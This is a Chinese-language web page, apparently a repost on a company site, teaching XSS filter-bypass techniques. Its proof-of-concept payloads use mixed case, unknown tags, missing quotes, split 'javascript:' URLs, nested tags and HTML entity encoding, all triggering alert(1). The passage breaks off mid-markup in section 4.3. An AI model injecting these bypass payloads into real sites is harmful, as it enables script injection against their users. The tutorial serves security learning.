关于我们 ABOUT 诚以载道,以信立本,合作共赢

当前位置: 首页 > 关于我们 > 行业动态

XSS漏洞挖掘之跨站脚本攻击

日期:2020-02-26 17:21:39 / 人气:

<section powered-by="xiumi.us" style="margin: 30px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; vertical-align: top; border-width: 1px; border-radius: 0px; border-style: none; border-color: rgb(76, 68, 71); background-color: rgb(238, 233, 241);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: -3px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; align-items: center; display: flex;"><section style="margin: -10px 0px -10px 20px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: bottom; width: auto; flex: 0 0 auto; border-width: 0px; border-radius: 0px; border-style: none; border-color: rgb(76, 68, 71);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; text-align: center; transform: translate3d(-10px, 0px, 0px);"><section style="margin: 0px; padding: 6px 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; min-width: 10%; vertical-align: top; transform: matrix(1, 0, -0.2, 1, 0, 0); border-style: solid; border-width: 0px; border-radius: 0px; border-color: rgb(76, 68, 71); background-image: linear-gradient(90deg, rgb(231, 59, 112) 0%, rgba(231, 59, 112, 0.2) 100%);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 1; letter-spacing: 0px; font-size: 32px; color: rgb(255, 255, 255);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">04</strong></p></section></section></section></section><section style="margin: 0px; padding: 10px 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: bottom; width: auto; flex: 1 1 auto; border-width: 0px;"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 2; letter-spacing: 1px; color: rgb(76, 68, 71);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">XSS漏洞挖掘技巧</strong></p></section></section></section></section></section></section><p></p><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; align-items: center; display: flex;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: top; width: auto; flex: 0 0 auto; border-width: 0px; border-radius: 1px; border-style: none; border-color: rgb(76, 68, 71); overflow: hidden; align-self: flex-start;"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; text-align: center; transform: translate3d(-10px, 0px, 0px);"><section style="margin: 0px; padding: 3px 5px 3px 20px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; min-width: 10%; vertical-align: top; transform: matrix(1, 0, -0.2, 1, 0, 0); border-style: solid; border-width: 0px; border-radius: 0px; border-color: rgb(76, 68, 71); background-color: rgb(231, 59, 112);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; color: rgb(255, 255, 255);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">4.1</strong></p></section></section></section></section><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: top; width: auto; flex: 100 100 0%; border-width: 0px; height: auto; box-shadow: rgb(0, 0, 0) 0px 0px 0px; align-self: flex-start;"><section powered-by="xiumi.us" style="margin: 3px 0px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 15px; line-height: 1.5; letter-spacing: 1px; color: rgb(76, 68, 71);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">常见的绕过姿势</strong></span></p></section></section></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">实际应用中web程序往往会通过一些过滤规则来阻止带有恶意代码的用户输入被显示,但由于HTML语言的松散性和各种标签的不同优先级,使得我们绕过过滤规则成为了可能。</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">4.1.1 利用大小写绕过</strong></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">HTML标签名和属性名是不区分大小写,我们可以全使用大写,或者混合使用,如下的几段代码都是可以被正确解析的:</p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><imG SRC="1" ONERROR="alert(1)"></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><ScRipt>alert(1)</SCRIpt></p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">4.1.2 使用未知标签</strong></p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><xxxx onclick="alert(1)">aaaa</xxxx></p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">4.1.3 不使用空格和引号</strong></p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><img src=1 onerror=alert(1)></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><img/src=&#39;1&#39;/onerror=alert(1)></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><body/onload=alert(1)></body></p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">4.1.4 不闭合标签</strong></p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><body/onload=alert(1)></p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">4.1.5 使用回车、Tab等符号截断javascript</strong></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">而浏览器中解析器中词法分析器会跳过空白跟换行之类的无效字符</p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="jav<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>ascRIPt:alert(1)">使用回车截断javascript</a><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><a href="javas&nbsp; cript:alert(1)">使用tab截断javascript</a></p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">4.1.6 利用过滤器规则</strong></p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><Sc<script>Ript>alert(1)</sCRIp</script>t></p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; align-items: center; display: flex;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: top; width: auto; flex: 0 0 auto; border-width: 0px; border-radius: 1px; border-style: none; border-color: rgb(76, 68, 71); overflow: hidden; align-self: flex-start;"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; text-align: center; transform: translate3d(-10px, 0px, 0px);"><section style="margin: 0px; padding: 3px 5px 3px 20px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; min-width: 10%; vertical-align: top; transform: matrix(1, 0, -0.2, 1, 0, 0); border-style: solid; border-width: 0px; border-radius: 0px; border-color: rgb(76, 68, 71); background-color: rgb(231, 59, 112);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; color: rgb(255, 255, 255);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">4.2</strong></p></section></section></section></section><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: top; width: auto; flex: 100 100 0%; border-width: 0px; height: auto; box-shadow: rgb(0, 0, 0) 0px 0px 0px; align-self: flex-start;"><section powered-by="xiumi.us" style="margin: 3px 0px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 15px; line-height: 1.5; letter-spacing: 1px; color: rgb(76, 68, 71);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">HTML编码</strong></span></p></section></section></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; text-align: left; overflow-wrap: break-word !important;">HTML标签中的某些属性值可以使用&#ASCII方式进行编码:</p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; text-align: left; overflow-wrap: break-word !important;">如把尖括号编码[ < ] -----> html十进制: < html十六进制:<</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; text-align: left; overflow-wrap: break-word !important;"><imgsrc=1 onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;"></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; text-align: left; overflow-wrap: break-word !important;"><img src=1 onerror=&#97&#108&#101&#114&#116&#40&#49&#41></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; text-align: left; overflow-wrap: break-word !important;"><img src=1 onerror="&#000097;&#0000108;&#0000101;&#0000114;&#0000116;&#000040;&#000049;&#000041;"></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; text-align: left; overflow-wrap: break-word !important;"><a href="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;">aaaa</a></p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; align-items: center; display: flex;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: top; width: auto; flex: 0 0 auto; border-width: 0px; border-radius: 1px; border-style: none; border-color: rgb(76, 68, 71); overflow: hidden; align-self: flex-start;"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; text-align: center; transform: translate3d(-10px, 0px, 0px);"><section style="margin: 0px; padding: 3px 5px 3px 20px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; min-width: 10%; vertical-align: top; transform: matrix(1, 0, -0.2, 1, 0, 0); border-style: solid; border-width: 0px; border-radius: 0px; border-color: rgb(76, 68, 71); background-color: rgb(231, 59, 112);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; color: rgb(255, 255, 255);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">4.3</strong></p></section></section></section></section><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: top; width: auto; flex: 100 100 0%; border-width: 0px; height: auto; box-shadow: rgb(0, 0, 0) 0px 0px 0px; align-self: flex-start;"><section powered-by="xiumi.us" style="margin: 3px 0px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 15px; line-height: 1.5; letter-spacing: 1px; color: rgb(76, 